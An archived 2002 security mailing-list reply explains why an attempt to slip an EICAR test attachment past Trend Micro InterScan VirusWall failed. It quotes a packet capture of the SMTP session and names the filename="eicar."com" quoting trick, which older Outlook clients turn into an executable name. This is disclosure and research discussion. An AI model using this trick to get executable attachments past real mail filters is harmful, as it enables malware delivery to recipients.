Re: bypassing attachments

From: 3APA3A (3APA3Aat_private)
Date: Sun Feb 24 2002 - 03:09:30 PST

  • Next message: Ehud Tenenbaum: "elm bug ver 2.5.3 maybe others. (not suid on linux but suid on other OS.)" 

    Dear Onie Camara,

dump   you   sent   exploits   vulnerability   found  by  Aidan  O'Kelly
<aidanokellyat_private> (see section I.9 in
http://www.security.nnov.ru/advisories/content.asp )

It  uses  filename="eicar."com"  - older versions of Outlook Express and
Outlook convert this filename to "eicar.com", others - to "eicar._com" -
that's why you failed.

--Saturday, February 23, 2002, 8:37:29 PM, you wrote to incidentsat_private:

OC> Hi guys,

OC> I don't know where to post actually.

OC> I am very interested in security and would like some of your help.

OC> I have found, I hope, a vulnerability in Trend Micro interscan viruswall.
OC> I have a setup of qmail and sqwebmail running on freebsd. When I send an
OC> email from sqwebmail containing
OC> the eicar test virus attachment, the attachment is bypassed by Interscan and
OC> is successfully delivered .

OC> I have escalated this to Trend Micro since the early week of January and
OC> until now, even with the latest pattern
OC> file, it is still bypassed.

OC> This is somewhat related to the Feb 18 post at
OC> http://www.securiteam.com/securitynews/5DP0I206AY.html

OC> Now, since I will be doing a pentest for another company, I would like some
OC> help on where I can download
OC> a perl script that will send an exe,com attachment to a mail server but will
OC> bypass the filtering gateway.

OC> I have used this script, http://www.securiteam.com/exploits/5ZP0D2K6AY.html
OC> It works but
OC> the extension's attachment changes. Ex. eicar.com will become eicar._com

OC> Here is a tcpdump:

OC> bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and
OC> port not 68 and port not 67 and port not 80 and not igmp
OC> tcpdump: listening on xl0
OC> 11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
OC> 2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
OC> 0,nop,nop,timestamp 546622090 0> (DF)
OC> 0x0000   4500 0040 66b1 4000 3406 1f70 41c0 7544        E..@f.@.4..pA.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000        ..........1`....
OC> 0x0020   b002 4000 6b45 0000 0204 05b4 0101 0402        ..@.kE..........
OC> 0x0030   0103 0300 0101 080a 2094 ca8a 0000 0000        ................
OC> 11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
OC> 1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
OC> 0,nop,nop,timestamp 908042 546622090> (DF)
OC> 0x0000   4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a        E..<.|@.@.j.....
OC> 0x0010   41c0 7544 0019 06e0 55a9 3946 a6ac 3161        A.uD....U.9F..1a
OC> 0x0020   a012 8218 d41b 0000 0204 05b4 0103 0300        ................
OC> 0x0030   0101 080a 000d db0a 2094 ca8a                  ............
OC> 11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
OC> <nop,nop,timestamp 546622090 908042> (DF)
OC> 0x0000   4500 0034 42c4 4000 3406 4369 41c0 7544        E..4B.@.4.CiA.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947        ..........1aU.9G
OC> 0x0020   8010 43e0 3e18 0000 0101 080a 2094 ca8a        ..C.>...........
OC> 0x0030   000d db0a                                      ....
OC> 11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
OC> 33304 <nop,nop,timestamp 908048 546622090> (DF)
OC> 0x0000   4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a        E..^~m@.@.......
OC> 0x0010   41c0 7544 0019 06e0 55a9 3947 a6ac 3161        A.uD....U.9G..1a
OC> 0x0020   8018 8218 e931 0000 0101 080a 000d db10        .....1..........
OC> 0x0030   2094 ca8a 3232 3020 7072 6f6d 6973 6375        ....220.promiscu
OC> 0x0040   6f75 732e 6479 6e64 6e73 2e6f 7267 2045        ous.dyndns.org.E
OC> 0x0050   534d 5450 2050 6f73 7466 6978 0d0a             SMTP.Postfix..
OC> 11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
OC> <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000   4500 0034 2223 4000 3406 640a 41c0 7544        E..4"#@.4.d.A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971        ..........1aU.9q
OC> 0x0020   8010 43e0 3de8 0000 0101 080a 2094 ca8a        ..C.=...........
OC> 0x0030   000d db10                                      ....
OC> 11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
OC> win 17376 <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000   4500 0054 5ac7 4000 3406 2b46 41c0 7544        E..TZ.@.4.+FA.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971        ..........1aU.9q
OC> 0x0020   8018 43e0 85fe 0000 0101 080a 2094 ca8a        ..C.............
OC> 0x0030   000d db10 4548 4c4f 2061 6e74 6973 7061        ....EHLO.antispa
OC> 0x0040   6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63        m.remingtonltd.c
OC> 0x0050   6f6d 0d0a                                      om..
OC> 11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
OC> win 33304 <nop,nop,timestamp 908050 546622090> (DF)
OC> 0x0000   4500 00a0 b62a 4000 4006 c396 0cf8 fc9a        E....*@.@.......
OC> 0x0010   41c0 7544 0019 06e0 55a9 3971 a6ac 3181        A.uD....U.9q..1.
OC> 0x0020   8018 8218 5f91 0000 0101 080a 000d db12        ...._...........
OC> 0x0030   2094 ca8a 3235 302d 7072 6f6d 6973 6375        ....250-promiscu
OC> 0x0040   6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a        ous.dyndns.org..
OC> 0x0050   3235 302d 5049 5045 4c49 4e49 4e47 0d0a        250-PIPELINING..
OC> 0x0060   3235 302d 5349 5a45 2032 3030 3030 3030        250-SIZE.2000000
OC> 0x0070   300d 0a32 3530 2d56 5246 590d 0a32 3530        0..250-VRFY..250
OC> 0x0080   2d45 5452 4e0d 0a32 3530 2d58 5645 5250        -ETRN..250-XVERP
OC> 0x0090   0d0a 3235 3020 3842 4954 4d49 4d45 0d0a        ..250.8BITMIME..
OC> 11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
OC> <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000   4500 0034 0598 4000 3406 8095 41c0 7544        E..4..@.4...A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd        ..........1.U.9.
OC> 0x0020   8010 4374 3dc6 0000 0101 080a 2094 ca8a        ..Ct=...........
OC> 0x0030   000d db12                                      ....
OC> 11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
OC> win 17376 <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000   4500 0078 01ee 4000 3406 83fb 41c0 7544        E..x..@.4...A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd        ..........1.U.9.
OC> 0x0020   8018 43e0 4202 0000 0101 080a 2094 ca8a        ..C.B...........
OC> 0x0030   000d db12 4d41 494c 2046 524f 4d3a 3c3e        ....MAIL.FROM:<>
OC> 0x0040   2053 495a 453d 3131 3139 0d0a 5243 5054        .SIZE=1119..RCPT
OC> 0x0050   2054 4f3a 3c6e 6569 6c40 7265 7374 7269        .TO:<neil@restri
OC> 0x0060   6374 6564 2e64 796e 646e 732e 6f72 673e        cted.dyndns.org>
OC> 0x0070   0d0a 4441 5441 0d0a                            ..DATA..
OC> 11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
OC> 101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
OC> 0x0000   4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a        E..ij.@.@.......
OC> 0x0010   41c0 7544 0019 06e0 55a9 39dd a6ac 31c5        A.uD....U.9...1.
OC> 0x0020   8018 8218 502b 0000 0101 080a 000d db15        ....P+..........
OC> 0x0030   2094 ca8a 3235 3020 4f6b 0d0a 3235 3020        ....250.Ok..250.
OC> 0x0040   4f6b 0d0a 3335 3420 456e 6420 6461 7461        Ok..354.End.data
OC> 0x0050   2077 6974 6820 3c43 523e 3c4c 463e 2e3c        .with.<CR><LF>.<
OC> 0x0060   4352 3e3c 4c46 3e0d 0a                         CR><LF>..
OC> 11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
OC> <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000   4500 0034 2d7e 4000 3406 58af 41c0 7544        E..4-~@.4.X.A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12        ..........1.U.:.
OC> 0x0020   8010 43ab 3d13 0000 0101 080a 2094 ca8a        ..C.=...........
OC> 0x0030   000d db15                                      ....
OC> 11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
OC> 204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000   4500 049c 4e19 4000 3406 33ac 41c0 7544        E...N.@.4.3.A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12        ..........1.U.:.
OC> 0x0020   8018 43e0 715b 0000 0101 080a 2094 ca8a        ..C.q[..........
OC> 0x0030   000d db15 5265 6365 6976 6564 3a20 6672        ....Received:.fr
OC> 0x0040   6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73        om.you.(localhos
OC> 0x0050   7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a        t.[127.0.0.1])..
OC> 0x0060   0962 7920 616e 7469 7370 616d 2e72 656d        .by.antispam.rem
OC> 0x0070   696e 6774 6f6e 6c74 642e 636f 6d20 2850        ingtonltd.com.(P
OC> 0x0080   6f73 7466 6978 2920 7769 7468 2053 4d54        ostfix).with.SMT
OC> 0x0090   5020 6964 2036 3730 4237 4538 4434 0d0a        P.id.670B7E8D4..
OC> 0x00a0   0966 6f72 203c 6e65 696c 4072 6573 7472        .for.<neil@restr
OC> 0x00b0   6963 7465 642e 6479 6e64 6e73 2e6f 7267        icted.dyndns.org
OC> 0x00c0   3e3b 2053 6174 2c20 3233 2046 6562 2032        >;.Sat,.23.Feb.2
OC> 0x00d0   3030 3220 3131 3a31 363a 3137 202d 3036        002.11:16:17.-06
OC> 0x00e0   3030 2028 4353 5429 0d0a 4672 6f6d 3a20        00.(CST)..From:.
OC> 0x00f0   736f 6d65 4072 656d 696e 6774 6f6e 6c74        some@remingtonlt
OC> 0x0100   642e 636f 6d0d 0a54 6f3a 206e 6569 6c40        d.com..To:.neil@
OC> 0x0110   7265 7374 7269 6374 6564 2e64 796e 646e        restricted.dyndn
OC> 0x0120   732e 6f72 670d 0a53 7562 6a65 6374 3a20        s.org..Subject:.
OC> 0x0130   7465 7374 0d0a 4d49 4d45 2d56 6572 7369        test..MIME-Versi
OC> 0x0140   6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74        on:.1.0..Content
OC> 0x0150   2d54 7970 653a 206d 756c 7469 7061 7274        -Type:.multipart
OC> 0x0160   2f72 656c 6174 6564 3b0d 0a20 2020 2020        /related;.......
OC> 0x0170   2020 2074 7970 653d 226d 756c 7469 7061        ...type="multipa
OC> 0x0180   7274 2f61 6c74 6572 6e61 7469 7665 223b        rt/alternative";
OC> 0x0190   0d0a 2020 2020 2020 2020 626f 756e 6461        ..........bounda
OC> 0x01a0   7279 3d22 4e65 7874 5061 7274 3139 220d        ry="NextPart19".
OC> 0x01b0   0a4d 6573 7361 6765 2d49 643a 203c 3230        .Message-Id:.<20
OC> 0x01c0   3032 3032 3233 3137 3136 3137 2e36 3730        020223171617.670
OC> 0x01d0   4237 4538 4434 4061 6e74 6973 7061 6d2e        B7E8D4@antispam.
OC> 0x01e0   7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d        remingtonltd.com
OC> 0x01f0   3e0d 0a44 6174 653a 2053 6174 2c20 3233        >..Date:.Sat,.23
OC> 0x0200   2046 6562 2032 3030 3220 3131 3a31 363a        .Feb.2002.11:16:
OC> 0x0210   3137 202d 3036 3030 2028 4353 5429 0d0a        17.-0600.(CST)..
OC> 0x0220   0d0a 5468 6973 2069 7320 6120 6d75 6c74        ..This.is.a.mult
OC> 0x0230   692d 7061 7274 206d 6573 7361 6765 2069        i-part.message.i
OC> 0x0240   6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a        n.MIME.format...
OC> 0x0250   0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a        ..--NextPart19..
OC> 0x0260   436f 6e74 656e 742d 5479 7065 3a20 6d75        Content-Type:.mu
OC> 0x0270   6c74 6970 6172 742f 616c 7465 726e 6174        ltipart/alternat
OC> 0x0280   6976 653b 0d0a 2020 2020 2020 2020 626f        ive;..........bo
OC> 0x0290   756e 6461 7279 3d22 4e65 7874 5061 7274        undary="NextPart
OC> 0x02a0   3230 220d 0a0d 0a2d 2d4e 6578 7450 6172        20"....--NextPar
OC> 0x02b0   7432 300d 0a43 6f6e 7465 6e74 2d54 7970        t20..Content-Typ
OC> 0x02c0   653a 2074 6578 742f 706c 6169 6e0d 0a43        e:.text/plain..C
OC> 0x02d0   6f6e 7465 6e74 2d54 7261 6e73 6665 722d        ontent-Transfer-
OC> 0x02e0   456e 636f 6469 6e67 3a20 7175 6f74 6564        Encoding:.quoted
OC> 0x02f0   2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d        -printable....--
OC> 0x0300   4e65 7874 5061 7274 3230 0d0a 436f 6e74        NextPart20..Cont
OC> 0x0310   656e 742d 5479 7065 3a20 7465 7874 2f68        ent-Type:.text/h
OC> 0x0320   746d 6c3b 0d0a 2020 2020 2020 2020 6368        tml;..........ch
OC> 0x0330   6172 7365 743d 2269 736f 2d38 3835 392d        arset="iso-8859-
OC> 0x0340   3122 0d0a 436f 6e74 656e 742d 5472 616e        1"..Content-Tran
OC> 0x0350   7366 6572 2d45 6e63 6f64 696e 673a 2071        sfer-Encoding:.q
OC> 0x0360   756f 7465 642d 7072 696e 7461 626c 650d        uoted-printable.
OC> 0x0370   0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450        ...test..--NextP
OC> 0x0380   6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578        art20--....--Nex
OC> 0x0390   7450 6172 7431 390d 0a43 6f6e 7465 6e74        tPart19..Content
OC> 0x03a0   2d54 7970 653a 2061 7070 6c69 6361 7469        -Type:.applicati
OC> 0x03b0   6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d        on/x-msdownload.
OC> 0x03c0   0a43 6f6e 7465 6e74 2d44 6973 706f 7369        .Content-Disposi
OC> 0x03d0   7469 6f6e 3a20 6174 7461 6368 6d65 6e74        tion:.attachment
OC> 0x03e0   3b66 696c 656e 616d 653d 2265 6963 6172        ;filename="eicar
OC> 0x03f0   2e22 636f 6d22 0d0a 436f 6e74 656e 742d        ."com"..Content-
OC> 0x0400   5472 616e 7366 6572 2d45 6e63 6f64 696e        Transfer-Encodin
OC> 0x0410   673a 2062 6173 6536 340d 0a0d 0a57 4456        g:.base64....WDV
OC> 0x0420   5049 5641 6c51 4546 5157 7a52 6355 4670        PIVAlQEFQWzRcUFp
OC> 0x0430   594e 5451 6f55 4634 704e 304e 444b 5464        YNTQoUF4pN0NDKTd
OC> 0x0440   394a 4556 4a51 3046 534c 564e 5551 5535        9JEVJQ0FSLVNUQU5
OC> 0x0450   4551 564a 454c 5546 4f56 456c 5753 564a        EQVJELUFOVElWSVJ
OC> 0x0460   5655 7931 5552 564e 550d 0a4c 555a 4a54        VUy1URVNU..LUZJT
OC> 0x0470   4555 684a 4567 7253 436f 4e43 673d 3d0d        EUhJEgrSCoNCg==.
OC> 0x0480   0a0d 0a2d 2d4e 6578 7450 6172 7431 392d        ...--NextPart19-
OC> 0x0490   2d0d 0a2e 0d0a 5155 4954 0d0a                  -.....QUIT..
OC> 11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
OC> <nop,nop,timestamp 908066 546622090> (DF)
OC> 0x0000   4500 0034 cc50 4000 4006 addc 0cf8 fc9a        E..4.P@.@.......
OC> 0x0010   41c0 7544 0019 06e0 55a9 3a12 a6ac 362d        A.uD....U.:...6-
OC> 0x0020   8010 8218 fa30 0000 0101 080a 000d db22        .....0........."
OC> 0x0030   2094 ca8a                                      ....
OC> 11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000   4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a        E..[.l@.@.......
OC> 0x0010   41c0 7544 0019 06e0 55a9 3a12 a6ac 362d        A.uD....U.:...6-
OC> 0x0020   8018 8218 00bc 0000 0101 080a 000d dbaa        ................
OC> 0x0030   2094 ca8a 3235 3020 4f6b 3a20 7175 6575        ....250.Ok:.queu
OC> 0x0040   6564 2061 7320 3843 4237 3635 3334 3745        ed.as.8CB765347E
OC> 0x0050   0d0a 3232 3120 4279 650d 0a                    ..221.Bye..
OC> 11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000   4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a        E..4.E@.@.......
OC> 0x0010   41c0 7544 0019 06e0 55a9 3a39 a6ac 362d        A.uD....U.:9..6-
OC> 0x0020   8011 8218 f980 0000 0101 080a 000d dbaa        ................
OC> 0x0030   2094 ca8a                                      ....
OC> 11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000   4500 0034 4a13 4000 3406 3c1a 41c0 7544        E..4J.@.4.<.A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39        ..........6-U.:9
OC> 0x0020   8010 43e0 37b7 0000 0101 080a 2094 ca8d        ..C.7...........
OC> 0x0030   000d dbaa                                      ....
OC> 11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
OC> 243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000   4500 0034 4ca3 4000 3406 398a 41c0 7544        E..4L.@.4.9.A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39        ..........6-U.:9
OC> 0x0020   8011 43e0 37b6 0000 0101 080a 2094 ca8d        ..C.7...........
OC> 0x0030   000d dbaa                                      ....
OC> 11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
OC> 0x0000   4500 0034 f518 4000 4006 8514 0cf8 fc9a        E..4..@.@.......
OC> 0x0010   41c0 7544 0019 06e0 55a9 3a39 a6ac 362e        A.uD....U.:9..6.
OC> 0x0020   8011 8218 f97a 0000 0101 080a 000d dbac        .....z..........
OC> 0x0030   2094 ca8d                                      ....
OC> 11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000   4500 0034 5a93 4000 3406 2b9a 41c0 7544        E..4Z.@.4.+.A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a        ..........6.U.::
OC> 0x0020   8010 43e0 37b5 0000 0101 080a 2094 ca8d        ..C.7...........
OC> 0x0030   000d dbaa                                      ....
OC> 11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908204> (DF)
OC> 0x0000   4500 0034 3e09 4000 3406 4824 41c0 7544        E..4>.@.4.H$A.uD
OC> 0x0010   0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a        ..........6.U.::
OC> 0x0020   8010 43e0 37b3 0000 0101 080a 2094 ca8d        ..C.7...........
OC> 0x0030   000d dbac                                      ....
OC> ^C




-- 
~/ZARAZA
Электрические шоки очень полезны для формирования характера. (Лем)

    This archive was generated by hypermail 2b30 : Sun Feb 24 2002 - 20:50:01 PST